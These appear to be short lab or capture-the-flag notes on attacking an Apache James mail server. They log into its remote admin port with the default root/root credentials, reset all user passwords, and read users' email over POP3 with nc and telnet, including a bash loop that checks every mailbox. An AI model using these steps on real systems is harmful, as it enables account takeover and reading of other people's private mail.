- First need to reset the password. Login to James remote admin via nc:
nc IP PORT
(default 4555). Then login using root root.help
to see the commands. reset all user password. - Use telnet to interact with the POP3 server:
telnet IP PORT
(default 110) - then login using:
user username
pass password
- Show emails using
list
- Optional two liner bash to see which person has email content:
for user in user1 user2 user3 user4 user5 user6; do ( echo USER ${user}; sleep 2s; echo PASS password; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC IP PORT; done
- If got a list, use
retr number
to read the email listed. (egretr 1
,retr 2
)